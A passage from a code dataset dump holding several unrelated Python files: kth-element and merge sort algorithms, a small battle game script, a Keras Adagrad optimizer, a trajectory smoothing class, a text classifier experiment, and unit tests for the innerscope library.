n1,n2= len(nums1), len(nums2)\n low,high=0,n1\n while low<=high:\n tmp = n1 + n2 - k\n partition_x = (low+high)//2\n partition_y = tmp - partition_x\n maxLeft_x = nums1[partition_x-1] if partition_x!=0 else float('-inf')\n minRight_x = nums1[partition_x] if partition_x!=n1 else float('inf')\n\n maxLeft_y = nums2[partition_y-1] if partition_y!=0 else float('-inf')\n minRight_y = nums2[partition_y] if partition_y!=n2 else float('inf')\n\n if maxLeft_x <= minRight_y and maxLeft_y<=minRight_x:\n return min(minRight_y, minRight_x)\n elif maxLeft_x>minRight_y:\n high = partition_x-1\n else:\n low=partition_x+1\n\n# sol = Solution()\n# x = [0,1,2,5,9]\n# y = [-2,-1,3,4,6,8]\n# k = 4\n# print(sol.kthElement(x, y,len(x),len(y), k), 5)\n# x = [1,10,10,25,40,54,79]\n# y = [15, 24, 27, 32, 33, 39, 48, 68, 82, 88, 90]\n# k = 15\n# print(sol.kthElement(x, y,len(x),len(y), k), 15)\n\n\n\n\n\n\n\n\n\n# https://yao.page/posts/kth-smallest-element-in-two-sorted-arrays-python/\ndef find_kth_smallest(A, B, k):\n\n lo=0\n hi = len(A) # it's \"len(A)\" and not \"len(A)-1\". the maximum number that can be chosen from the first array\n\n # more efficient\n # If *all* elements in B are in B's left ptn,\n # we'll need at least k - len(B) elements\n # in A's left ptn\n # lo = max(0, k - len(B))\n\n # If k is less than the size of A, then we\n # only need at most k elements in A's left ptn\n # hi = min(len(A), k)\n\n def get_val(arr, i): # more detail: check out the link -> https://yao.page/posts/kth-smallest-element-in-two-sorted-arrays-python/\n if 0 <= i <= len(arr) - 1:\n return arr[i]\n return math.inf * (-1 if i < 0 else 1)\n\n while lo <= hi:\n A_size = (lo + hi) // 2 # A_size indicates left size of A\n B_size = k - A_size\n\n A_left, A_right = get_val(A, A_size-1), get_val(A, A_size)\n B_left, B_right = get_val(B, B_size-1), get_val(B, B_size)\n\n if A_left <= B_right and B_left <= A_right:\n return max(A_left, B_left)\n\n elif A_left > B_right:\n hi =A_size - 1\n\n else: # B_left > A_right\n lo = A_size + 1\n\n\n\n\nclass MyTestCase2(unittest.TestCase):\n def test_3(self):\n x = [1,3,5,7,9,11]\n y = [2,4,6,8,10]\n k = 6\n actual = find_kth_smallest(x,y, k)\n expected = 5\n self.assertEqual(expected, actual)\n\n\n\n\n\n\n# Base cases:\n#\n# If length of one of the arrays is 0, the answer is kth element of the second array.\n# Reduction steps:\n#\n# If mid index of a + mid index of b is less than k:\n# If mid element of a is greater than mid element of b, we can ignore the first half of b, adjust k.\n# Otherwise, ignore the first half of a, adjust k.\n# If k is less than sum of mid indices of a and b:\n# If mid element of a is greater than mid element of b, we can safely ignore second half of a.\n# Otherwise, we can ignore second half of b.\ndef kthlargest(a, b, k):\n if len(a) == 0:\n return b[k]\n elif len(b) == 0:\n return a[k]\n\n mid1 = len(a) // 2 # integer division\n mid2 = len(b) // 2\n if mid1 + mid2 < k:\n if a[mid1] > b[mid2]:\n return kthlargest(a, b[mid2 + 1:], k - mid2 - 1)\n else:\n return kthlargest(a[mid1 + 1:], b, k - mid1 - 1)\n else:\n if a[mid1] > b[mid2]:\n return kthlargest(a[:mid1], b, k)\n else:\n return kthlargest(a, b[:mid2], k)\n\n\n# class MyTestCase(unittest.TestCase):\n# def test_2(self):\n# x = [5]\n# y = [2,4,6,8,10]\n# k = 1\n# actual = kthlargest(x,y, k)\n# expected = 4\n# self.assertEqual(expected, actual)\n# def test_3(self):\n# x = [1,3,5,7,9,11]\n# y = [2,4,6,8,10]\n# k = 4\n# actual = kthlargest(x,y, k)\n# expected = 5\n# self.assertEqual(expected, actual)\n","repo_name":"afzalsiddique/problem-solving","sub_path":"Problem_Solving_Python/gfg/kth_largest_element_in_two_sorted_arrays.py","file_name":"kth_largest_element_in_two_sorted_arrays.py","file_ext":"py","file_size_in_byte":5978,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"37533807026","text":"\ndef Merge(list2, list, left, middle, right):\n #list为合并后的目标数组,将有序的序列 list2[s..m] 和 list2[m+1..t]归并为有序的序列 list[s..t]\n i = left\n j = middle + 1\n k = left\n while (i <= middle) and (j <= right):\n if list2[i] <= list2[j]:\n list[k] = list2[i]\n i = i + 1\n else:\n list[k] = list2[j]\n j = j + 1\n k = k + 1\n if i <= middle:\n while i <= middle:\n list[k] = list2[i]\n k = k + 1\n i = i + 1\n if j <= right:\n while j <= right:\n list[k] = list2[j]\n k = k + 1\n j = j + 1\n\ndef Msort(list2, list, start, end):\n #将 list2[s..t] 通过 list3[] 归并排序为 list[s..t]\n list3 = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]\n if start == end:\n list[start] = list2[start]\n else:\n middle = int((start + end) / 2)\n Msort(list2, list3, start, middle)\n Msort(list2, list3, middle+1, end)\n Merge(list3, list, start, middle, end)\n\ndef MergeSort(list): #默认第0项为哨兵项\n size = len(list) - 1\n Msort(list, list, 1, size)\n\ndef main():\n list = [ 0.0, 6.0, 2.2, 7.2, 4.0, 9.0, 0.8, 5.0, 6.0, 2.0 ]\n print(list[1::])\n MergeSort(list)\n print(list[1::])\n\nif __name__ == '__main__':\n print(__name__)\n main()\n","repo_name":"ToLoveToFeel/Sort_Python","sub_path":"4.MergeSort/MergeSort/MergeSort.py","file_name":"MergeSort.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37988653748","text":"from assasin import Assasin\nfrom samurai import Samurai\nfrom ninja import Ninja\nfrom vampyre import Vampyre\nfrom colorama import Fore\n\nprint('Красные юниты - Красныя команда')\nprint('Синие юниты - Синяя команда')\n\nplayer1 = Assasin(name='Эцио', health=700, damage=30, defence=0,\n color=Fore.LIGHTRED_EX)\nprint(player1)\n\nplayer2 = Samurai(name='武士', health=1000, damage=10, defence=0,\n color=Fore.LIGHTBLUE_EX)\nprint(player2)\n\nplayer3 = Ninja(name='Ninjaon', health=900, damage=50, defence=0,\n color=Fore.LIGHTMAGENTA_EX)\nprint(player3)\n\nplayer4 = Vampyre(name='Drakula', health=1000, damage=30, defence=0,\n color=Fore.LIGHTCYAN_EX)\nprint(player4)\n\nwhile player1.is_alive() and player2.is_alive():\n player1.attack(player2)\n player2.attack(player1)\n\n\n print(player1)\n print(player2)\n\n\nwhile player3.is_alive() and player4.is_alive():\n player3.attack(player4)\n player4.attack(player3)\n print(player3)\n print(player4)","repo_name":"SmokeEtern1tygamingSCPRP/student","sub_path":"Lesson_3/maining.py","file_name":"maining.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"15937333021","text":"\nimport numpy as np\nfrom tensorflow.python.framework import dtypes\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.keras import backend_config\nfrom tensorflow.python.keras.optimizer_v2 import optimizer_v2\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.ops import init_ops\nfrom tensorflow.python.training import gen_training_ops\nfrom tensorflow.python.util.tf_export import keras_export\n@keras_export('keras.optimizers.Adagrad')\nclass Adagrad(optimizer_v2.OptimizerV2):\n r\"\"\"Optimizer that implements the Adagrad algorithm.\n Adagrad is an optimizer with parameter-specific learning rates,\n which are adapted relative to how frequently a parameter gets\n updated during training. The more updates a parameter receives,\n the smaller the updates.\n Args:\n learning_rate: Initial value for the learning rate:\n either a floating point value,\n or a `tf.keras.optimizers.schedules.LearningRateSchedule` instance.\n Defaults to 0.001.\n Note that `Adagrad` tends to benefit from higher initial learning rate\n values compared to other optimizers.\n To match the exact form in the original paper, use 1.0.\n initial_accumulator_value: Floating point value.\n Starting value for the accumulators (per-parameter momentum values).\n Must be non-negative.\n epsilon: Small floating point value used to maintain numerical stability.\n name: Optional name prefix for the operations created when applying\n gradients. Defaults to `\"Adagrad\"`.\n **kwargs: Keyword arguments. Allowed to be one of\n `\"clipnorm\"` or `\"clipvalue\"`.\n `\"clipnorm\"` (float) clips gradients by norm and represents\n the maximum L2 norm of each weight variable;\n `\"clipvalue\"` (float) clips gradient by value and represents the\n maximum absolute value of each weight variable.\n Reference:\n - [Duchi et al., 2011](\n http://www.jmlr.org/papers/volume12/duchi11a/duchi11a.pdf).\n \"\"\"\n _HAS_AGGREGATE_GRAD = True\n def __init__(self,\n learning_rate=0.001,\n initial_accumulator_value=0.1,\n epsilon=1e-7,\n name='Adagrad',\n **kwargs):\n if initial_accumulator_value < 0.0:\n raise ValueError('initial_accumulator_value must be non-negative: %s' %\n initial_accumulator_value)\n if epsilon is None:\n epsilon = backend_config.epsilon()\n super(Adagrad, self).__init__(name, **kwargs)\n self._set_hyper('learning_rate', kwargs.get('lr', learning_rate))\n self._set_hyper('decay', self._initial_decay)\n self._initial_accumulator_value = initial_accumulator_value\n self.epsilon = epsilon or backend_config.epsilon()\n def _create_slots(self, var_list):\n for var in var_list:\n dtype = var.dtype.base_dtype\n init = init_ops.constant_initializer(\n self._initial_accumulator_value, dtype=dtype)\n self.add_slot(var, 'accumulator', init)\n def _prepare_local(self, var_device, var_dtype, apply_state):\n super(Adagrad, self)._prepare_local(var_device, var_dtype, apply_state)\n apply_state[(var_device, var_dtype)].update(\n dict(\n epsilon=ops.convert_to_tensor_v2_with_dispatch(\n self.epsilon, var_dtype),\n neg_lr_t=-apply_state[(var_device, var_dtype)]['lr_t'],\n zero=array_ops.zeros((), dtype=dtypes.int64)))\n def set_weights(self, weights):\n params = self.weights\n if len(params) == len(weights) + 1:\n weights = [np.array(0)] + weights\n super(Adagrad, self).set_weights(weights)\n @classmethod\n def from_config(cls, config, custom_objects=None):\n if 'initial_accumulator_value' not in config:\n config['initial_accumulator_value'] = 0.1\n if 'lr' in config:\n config['learning_rate'] = config.pop('lr')\n return cls(**config)\n def _resource_apply_dense(self, grad, var, apply_state=None):\n var_device, var_dtype = var.device, var.dtype.base_dtype\n coefficients = ((apply_state or {}).get((var_device, var_dtype))\n or self._fallback_apply_state(var_device, var_dtype))\n acc = self.get_slot(var, 'accumulator')\n return gen_training_ops.ResourceApplyAdagradV2(\n var=var.handle,\n accum=acc.handle,\n lr=coefficients['lr_t'],\n epsilon=coefficients['epsilon'],\n grad=grad,\n use_locking=self._use_locking)\n def _resource_apply_sparse(self, grad, var, indices, apply_state=None):\n var_device, var_dtype = var.device, var.dtype.base_dtype\n coefficients = ((apply_state or {}).get((var_device, var_dtype))\n or self._fallback_apply_state(var_device, var_dtype))\n acc = self.get_slot(var, 'accumulator')\n return gen_training_ops.ResourceSparseApplyAdagradV2(\n var=var.handle,\n accum=acc.handle,\n lr=coefficients['lr_t'],\n epsilon=coefficients['epsilon'],\n grad=grad,\n indices=indices,\n use_locking=self._use_locking)\n def get_config(self):\n config = super(Adagrad, self).get_config()\n config.update({\n 'learning_rate': self._serialize_hyperparameter('learning_rate'),\n 'decay': self._initial_decay,\n 'initial_accumulator_value': self._initial_accumulator_value,\n 'epsilon': self.epsilon,\n })\n return config\n","repo_name":"Mockingbird01001/NLG-code-generator-LSTM","sub_path":"work/data/data_model/batch_3/adagrad.py.transformed.py","file_name":"adagrad.py.transformed.py","file_ext":"py","file_size_in_byte":5291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2032144674","text":"from nazhigai_calc import *\nfrom time_convert import *\n\n\n\n# start : daytime\n# end : daytime\n# vibagam: int\n# no_vibagam : int\n\nclass kalavibagam:\n def __init__(self,start,end,vibagam,no_vibagam):\n self.start = start\n self.end = end\n self.no_vibagam = no_vibagam\n self.alavu = end - start\n self.vibagam = self.alavu/vibagam\n self.vibagam_tr = timedelta(seconds=self.vibagam.seconds) # time rounded\n no_v = self.no_vibagam-1\n self.start_time = self.start + self.vibagam_tr*no_v\n self.end_time = self.start_time + self.vibagam_tr\n return\n\n","repo_name":"swadharm/sw_api","sub_path":"panjangam_api/kalavibagam.py","file_name":"kalavibagam.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25692136594","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport pandas as pd\nfrom Point import Point\n\n\nclass Trajectory(object):\n \"\"\"\n 1. Метод, который кушае�� одну приходящую точку (x, y, z, v_x=np.nan, v_y=np.nan, v_z=np.nan, a_x=np.nan,\n a_y=np.nan, a_z=np.nan),\n если тестовый режим работы - зашумляем, если присутствуют только координаты, *считает* скорости, ускорения и\n сохраняет это в self.x_list, self...\n 2. Внутренний методы просчёта, фильтрации и аппроксимации траекторий.\n 3. Метод для тестового зашумления данных и тд\n \"\"\"\n\n def __init__(self):\n # Координаты, скорости, ускорения и таймстампы точек траектории\n self.trajectory = []\n # Значения точек траектории, полученные после её обработки одним\n # или несколькими последовательно примененными алгоритмами фильтрации\n # и интерполяции\n self.filtered_trajectory = []\n self.trajectory_id = None\n self.trajectory_type = None\n\n def add_point_by_coordinates(self, timestamp, x, y, z,\n v_x=np.nan, v_y=np.nan, v_z=np.nan,\n a_x=np.nan, a_y=np.nan, a_z=np.nan):\n self.add_point(Point(timestamp, x, y, z, v_x, v_y, v_z, a_x, a_y, a_z))\n return self\n\n def add_point(self, point):\n \"\"\"\n Добавление новой точки:\n\n Аргументы:\n point: Point: объект класса Point,\n \"\"\"\n self.trajectory.append(point)\n self.filtered_trajectory = self.trajectory\n # для пересчёта траектории с фильтрацией раскомментировать следующую строчку:\n # self._filter_trajectory(filtring_type=\"l1_filtering\")\n\n if len(self.trajectory) > 1:\n self._recompute_speed()\n if len(self.trajectory) > 2:\n self._recompute_accelerations()\n return self\n\n def get_info_object(self):\n \"\"\"\n Получает информацию об объекте в крайней точке\n :return: Лист с информацией\n \"\"\"\n last_point = self.trajectory[-1]\n coordinate = last_point.get_coordinates()\n speed = last_point.get_speed(), last_point.get_speed_value()\n acceleration = last_point.get_acceleration(), last_point.get_acceleration_value()\n return coordinate, speed, acceleration\n\n def _recompute_speed(self):\n \"\"\"\n Функция вычисления скорости по вновь пришедшей и предыдущей точке.\n \"\"\"\n last_point = self.filtered_trajectory[-2]\n current_point = self.filtered_trajectory[-1]\n v = (current_point.get_coordinates() - last_point.get_coordinates() + len(self.trajectory) * 0.00000001) / \\\n (current_point.timestamp - last_point.timestamp).total_seconds()\n current_point.set_speed(v[0], v[1], v[2])\n\n def _recompute_accelerations(self):\n \"\"\"\n Функция вычисления ускорения по вновь пришедшей и предыдущей точке.\n \"\"\"\n last_point = self.filtered_trajectory[-2]\n current_point = self.filtered_trajectory[-1]\n a_x, a_y, a_z = (current_point.get_speed() - last_point.get_speed()) / \\\n (current_point.timestamp - last_point.timestamp).total_seconds()\n current_point.set_acceleration(a_x, a_y, a_z)\n\n def _filter_trajectory(self, filtring_type=None):\n\n import copy\n \"\"\"\n Фильтрация и сглаживание траектории одним из способов:\n Нужно минимум window точек\n \"\"\"\n\n def savgol(arr, window=15, order=5, deriv=0, rate=1):\n \"\"\"\n Функция вычисления сглаживания Сав в окне\n\n :param arr: list-like: список точек\n :param window: int: окно, в котором происходит сглаживание\n :param order: int: порядок сглаживания\n :param deriv: int: порядок производной\n :param rate: int:\n :return:\n \"\"\"\n # window >= order + 2\n from math import factorial\n\n if len(arr) < window:\n window = len(arr)\n if window < order + 2:\n order = window - 2\n\n y = np.asarray(arr[:])\n order_range = range(order + 1)\n half_window = (window - 1) // 2\n b = np.mat([[k ** j for j in order_range] for k in range(-half_window, half_window + 1)])\n m = np.linalg.pinv(b).A[deriv] * rate ** deriv * factorial(deriv)\n firstvals = y[0] - np.abs(y[1:half_window + 1][::-1] - y[0])\n lastvals = y[-1] + np.abs(y[-half_window - 1:-1][::-1] - y[-1])\n y = np.concatenate((firstvals, y, lastvals))\n return np.convolve(m[::-1], y, mode='valid')\n\n # вычисление сглаживания отдельно для каждой из координат:\n self.filtered_trajectory = copy.deepcopy(self.trajectory)\n if len(self.filtered_trajectory) > 2:\n filtered_coordinate = savgol([self.trajectory[i].x for i in range(len(self.trajectory))])\n for i in range(len(self.filtered_trajectory)):\n self.filtered_trajectory[i].x = filtered_coordinate[i]\n filtered_coordinate = savgol([self.trajectory[i].y for i in range(len(self.trajectory))])\n for i in range(len(self.filtered_trajectory)):\n self.filtered_trajectory[i].y = filtered_coordinate[i]\n filtered_coordinate = savgol([self.trajectory[i].z for i in range(len(self.trajectory))])\n for i in range(len(self.filtered_trajectory)):\n self.filtered_trajectory[i].z = filtered_coordinate[i]\n\n return self.filtered_trajectory\n\n def get_coordinates_list(self):\n \"\"\"\n Метод, который выдаёт список координат в формате [[t_1, ..., t_n],\n [x_1, ..., x_n], [y_1, ..., y_n], [z_1, ..., z_n], ]\n \"\"\"\n ts = [coord.timestamp for coord in self.filtered_trajectory]\n xs = [coord.x for coord in self.filtered_trajectory]\n ys = [coord.y for coord in self.filtered_trajectory]\n zs = [coord.z for coord in self.filtered_trajectory]\n\n return ts, xs, ys, zs\n\n def load_trajectory(self, filename=\"data/trajectories/ID001.json\"):\n \"\"\"\n Функция загрузки траектории из файла.\n\n :param filename: str: Строка, указывающая полный путь до файла траектории\n :return:\n \"\"\"\n df = pd.read_json(filename, orient=\"records\", lines=True)\n df = df.iloc[len(self.trajectory):]\n for point_ in df.iterrows():\n ts, xs, ys, zs = point_[1].values\n self.add_point_by_coordinates(ts, xs, ys, zs)\n\n def save_trajectory(self, filename=\"data/trajectories/ID001.json\", ):\n \"\"\"\n Функция сохранения траектории в файл.\n\n :param filename: str: Строка, указывающая полный путь до файла траектории\n :return:\n \"\"\"\n\n ts, xs, ys, zs = self.get_coordinates_list()\n df = pd.DataFrame(np.array([[t.isoformat() for t in ts], xs, ys, zs]).T, columns=[\"timestamp\", \"x\", \"y\", \"z\"])\n\n df.to_json(filename, orient=\"records\", lines=True)\n","repo_name":"elejke/rocket_aimer","sub_path":"Trajectory.py","file_name":"Trajectory.py","file_ext":"py","file_size_in_byte":8117,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17222967492","text":"# problem and test cases:\n# @GeekforGeeks: https://practice.geeksforgeeks.org/problems/stock-span-problem/0\ndef getSpan():\n stack=[]\n span =[0 for i in range(n)]\n for i in range(n):\n if(len(stack) ==0):\n span[i]=i+1\n else:\n while(len(stack)!=0 and arr[stack[-1]]<= arr[i] ):\n stack.pop()\n if(len(stack)==0):\n span[i]=i+1\n else:\n span[i]=i-stack[-1]\n stack.append(i)\n print(\" \".join(str(x) for x in span))\n\ntest = int(input())\nfor i in range(test):\n n = int(input())\n arr = list(map(int,input().strip().split(\" \")))\n getSpan()\n ","repo_name":"rahul-raj-s/stackProblems","sub_path":"stockSpan/stockSpan.py","file_name":"stockSpan.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"35646817757","text":"from __future__ import absolute_import\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.svm import LinearSVC\nfrom sklearn.naive_bayes import MultinomialNB\n\nimport torch\nimport os\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import ConfusionMatrixDisplay, classification_report\nfrom sklearn.metrics import cohen_kappa_score\n\n\ndef load_data(is_mt5=True):\n if is_mt5:\n path = 'mt5'\n dev_data = pd.read_json(\"/data/results/dataset/mt5/dev_dataset.json\")\n train_data = pd.read_json(\"/data/results/dataset/mt5/train_dataset.json\")\n else:\n path = 't5'\n dev_data = pd.read_json(\"/data/results/dataset/t5/dev_dataset.json\")\n train_data = pd.read_json(\"/data/results/dataset/t5/train_dataset.json\")\n \n return train_data, dev_data, path\n\n\ndef preprocess_data(dev_data, train_data):\n dev_data = dev_data.sample(frac=1, random_state=420).reset_index(drop=True)\n train_data = train_data.sample(frac=1, random_state=420).reset_index(drop=True)\n \n dev_data['label'] = dev_data['label'].replace({'refute': 0, 'support': 1})\n train_data['label'] = train_data['label'].replace({'refute': 0, 'support': 1})\n \n y_test = dev_data['label'].values\n y_train = train_data['label'].values\n \n vectorizer = TfidfVectorizer(\n sublinear_tf=True, max_df=0.5, min_df=5, stop_words=None\n )\n \n X_train = vectorizer.fit_transform(list(train_data['claim']))\n X_test = vectorizer.transform(list(dev_data['claim']))\n\n target_names = ['refute', 'support']\n\n return X_train, X_test, y_train, y_test, target_names\n\n\ndef process():\n for model_type in [True, False]: \n train_data, dev_data, path = load_data(is_mt5=model_type)\n\n if model_type:\n print(\"Evaluating mT5 dataset...\")\n else:\n print(\"Evaluating T5 dataset...\")\n\n X_train, X_test, y_train, y_test, target_names = preprocess_data(dev_data=dev_data, train_data=train_data)\n\n model = LogisticRegression(random_state=0, max_iter=1000)\n base_dir = '/data/results/experiments'\n \n if not os.path.exists(base_dir):\n os.makedirs(base_dir)\n \n path = base_dir + '/' + path\n if not os.path.exists(path):\n os.makedirs(path)\n\n model.fit(X_train, y_train)\n pred = model.predict(X_test)\n\n print(model.__class__,__name__)\n print(classification_report(y_test,pred, target_names=target_names))\n\n fig, ax = plt.subplots(figsize=(10, 5))\n ConfusionMatrixDisplay.from_predictions(y_test, pred, ax=ax)\n ax.xaxis.set_ticklabels(target_names)\n ax.yaxis.set_ticklabels(target_names)\n _ = ax.set_title(\n f\"Confusion Matrix for {model.__class__.__name__}\"\n )\n plt.savefig(path + '/' + model.__class__.__name__ + \".png\")\n\n\nif __name__==\"__main__\":\n if torch.cuda.is_available() and torch.cuda.device_count() > 1:\n with torch.cuda.device(0):\n process()","repo_name":"xkamen21/designing-a-multilingual-fact-checking-dataset-from-existing-question-answering-data","sub_path":"code/experiments/classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":3106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22895779461","text":"import pickle\n\nimport pytest\n\nimport innerscope\nfrom innerscope import cfg, scoped_function\n\nglobal_x = 1\nhex = 1 # shadow a builtin\n\n\ndef test_version():\n assert innerscope.__version__ >= \"0.5\"\n\n\ndef test_no_args():\n @scoped_function\n def f1():\n a = 1\n b = a + 1\n\n assert not f1.missing\n scope1 = f1()\n assert len(scope1) == 2\n assert scope1 == dict(a=1, b=2)\n assert scoped_function(f1)() == dict(a=1, b=2)\n\n def f2():\n c = b + 1\n\n def check(f2bound):\n assert not f2bound.missing\n assert f2bound.inner_names == {\"c\"}\n assert f2bound.outer_scope[\"b\"] == 2\n scope2 = f2bound()\n assert scope2 == dict(b=2, c=3)\n\n check(innerscope.bindwith(b=2)(f2))\n check(innerscope.bindwith({\"b\": 2})(f2))\n\n sf2 = scoped_function(f2)\n assert sf2.missing == {\"b\"}\n with pytest.warns(UserWarning, match=\"Undefined variables: 'b'\"), pytest.raises(NameError):\n sf2()\n\n check(sf2.bind(b=2))\n check(sf2.bind({\"b\": 2}))\n check(sf2.bind(scope1))\n check(scope1.bindto(sf2))\n check(scope1.bindto(sf2.func))\n check(scoped_function(sf2, scope1))\n check(scoped_function(sf2.func, scope1))\n\n\ndef test_no_args_call():\n def f1():\n a = 1\n b = a + 1\n\n def check(scope1):\n assert scope1 == dict(a=1, b=2)\n\n scope1 = innerscope.call(f1)\n check(scope1)\n check(innerscope.callwith()(f1))\n\n def f2():\n c = b + 1\n\n def check(scope2):\n assert scope2 == dict(b=2, c=3)\n\n check(scope1.call(f2))\n check(scope1.callwith()(f2))\n\n with pytest.raises(TypeError, match=\"missing 1 required positional\"):\n scope1.call()\n with pytest.raises(TypeError, match=\"missing 1 required positional\"):\n innerscope.call()\n\n\ndef test_with_args():\n def f1(a):\n b = a + 1\n\n def check(scope1):\n assert scope1 == dict(a=1, b=2)\n\n assert not scoped_function(f1).missing\n scope1 = scoped_function(f1)(1)\n check(scope1)\n check(innerscope.call(f1, 1))\n check(innerscope.callwith(1)(f1))\n\n def f2(c):\n d = a + 3\n e = b + c\n\n def check(scope2):\n assert scope2 == dict(a=1, b=2, c=3, d=4, e=5)\n\n sf2 = scoped_function(f2)\n assert sf2.missing == {\"a\", \"b\"}\n check(sf2.bind(a=1, b=2)(3))\n check(sf2.bind({\"a\": 1}, {\"b\": 2})(3))\n check(sf2.bind(scope1)(3))\n check(scope1.bindto(sf2)(3))\n check(scope1.bindto(f2)(3))\n check(scope1.call(f2, 3))\n check(scope1.callwith(3)(f2))\n\n\ndef test_scoped_function_decorators():\n @scoped_function\n def f1():\n a = 1\n\n @scoped_function()\n def f2():\n a = 1\n\n @scoped_function({\"a\": 1})\n def f3():\n b = a + 1\n\n assert f1() == {\"a\": 1}\n assert f2() == {\"a\": 1}\n assert f3() == {\"a\": 1, \"b\": 2}\n\n\ndef test_bindto_keeps_options():\n @scoped_function(use_closures=True, use_globals=False)\n def f1():\n a = 1\n\n def f2():\n b = a + 1\n\n scope1 = f1()\n sf2 = scope1.bindto(f2)\n assert sf2.use_closures is True\n assert sf2.use_globals is False\n\n sf2 = scope1.bindto(f2, use_closures=False, use_globals=True)\n assert sf2.use_closures is False\n assert sf2.use_globals is True\n assert dict(sf2()) == {\"a\": 1, \"b\": 2}\n\n\ndef test_use_closure():\n a = b = c = d = e = x = y = -1\n\n def f1(a):\n b = a + x + 2\n\n assert not scoped_function(f1).missing\n assert scoped_function(f1, use_closures=False).missing == {\"x\"}\n\n # Overwrite closure\n scope1 = scoped_function(f1, {\"x\": 10})(1)\n assert scope1 == dict(x=10, a=1, b=13)\n\n # Default closure\n scope1 = scoped_function(f1)(1)\n assert scope1 == dict(x=-1, a=1, b=2)\n\n def f2(c):\n d = a + 2 + y\n e = b + c\n\n assert not scoped_function(f2).missing\n\n # Overwrite closure\n scope2 = scoped_function(f2).bind(scope1, y=1)(3)\n assert scope2 == dict(y=1, a=1, b=2, c=3, d=4, e=5)\n\n # Overwrite closure (partially)\n scope2 = scoped_function(f2, scope1)(3)\n assert scope2 == dict(y=-1, a=1, b=2, c=3, d=2, e=5)\n\n # Default closure\n scope2 = scoped_function(f2)(3)\n assert scope2 == dict(y=-1, a=-1, b=-1, c=3, d=0, e=2)\n\n\ndef test_use_globals():\n def f1():\n x = global_x\n\n assert not scoped_function(f1, use_globals=True).missing\n assert scoped_function(f1, use_globals=False).missing == {\"global_x\"}\n assert scoped_function(f1, use_globals=True)() == {\"x\": 1, \"global_x\": 1}\n scope = scoped_function(f1, {\"global_x\": 1}, use_globals=True)()\n assert scope == {\"x\": 1, \"global_x\": 1}\n\n\ndef test_closures():\n def f(arg_f):\n nonlocal_y = 2\n\n def g(arg_g):\n local_z = global_x + nonlocal_y + arg_f + arg_g\n\n return g\n\n assert scoped_function(f).inner_names == {\"arg_f\", \"nonlocal_y\", \"g\"}\n g = f(1)\n scoped_g = scoped_function(g)\n assert scoped_g.inner_names == {\"arg_g\", \"local_z\"}\n assert scoped_g.outer_scope == {\"global_x\": 1, \"arg_f\": 1, \"nonlocal_y\": 2}\n assert scoped_g(3) == {\"arg_f\": 1, \"nonlocal_y\": 2, \"global_x\": 1, \"arg_g\": 3, \"local_z\": 7}\n\n\ndef test_has_builtins():\n @innerscope.call\n def f():\n x = min(1, 2)\n d = dict(a=x, b=3)\n\n assert f == dict(x=1, d={\"a\": 1, \"b\": 3})\n\n\ndef test_raises_error():\n @scoped_function\n def f():\n 1 / 0\n\n with pytest.raises(ZeroDivisionError):\n f()\n\n\ndef test_return_values():\n @innerscope.call\n def f1():\n pass\n\n assert f1.return_value is None\n assert f1 == {}\n\n @innerscope.call\n def f2():\n return 5\n\n assert f2.return_value == 5\n assert f2 == {}\n\n @innerscope.callwith(0)\n def f3(x):\n y = x + 1\n return x + 1 + y\n\n assert f3.return_value == 2\n assert f3 == {\"x\": 0, \"y\": 1}\n\n\ndef test_early_return():\n # We do not yet check for return statements in the function body upon creation\n @scoped_function\n def f(boolean):\n if boolean:\n return 42\n a = 1\n b = a + 1\n\n # But we can check the return type\n # with pytest.raises(ValueError, match=\"must return at the very end of the function\"):\n # f(True)\n scope = f(True)\n assert scope == {\"boolean\": True}\n assert scope.return_value == 42\n\n scope = f(False)\n assert scope == dict(a=1, b=2, boolean=False)\n\n @scoped_function\n def g(boolean):\n if boolean:\n return (1, 2, 3)\n a = 1\n b = a + 1\n\n # with pytest.raises(ValueError, match=\"must return at the very end of the function\"):\n # g(True)\n scope = g(True)\n assert scope == {\"boolean\": True}\n assert scope.return_value == (1, 2, 3)\n\n scope = g(False)\n assert scope == dict(a=1, b=2, boolean=False)\n\n\ndef test_difficult_return():\n # fmt: off\n x = 1\n\n @scoped_function\n def f1(arg):\n if arg:\n return 1\n x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ;\n x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ;\n x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ;\n x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ;\n y = x\n return 2\n\n if cfg.default_method == \"bytecode\":\n with pytest.raises(ValueError, match=\"The first return statement is too far away\"):\n f1(True)\n if cfg.default_method == \"trace\":\n scope = f1(True)\n assert scope == {\"x\": 1, \"arg\": True}\n assert scope.return_value == 1\n\n scope = f1(False)\n assert scope == {\"arg\": False, \"y\": 1, \"x\": 1}\n assert scope.return_value == 2\n\n @scoped_function\n def f2(arg):\n if arg == 0:\n return 1\n x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x 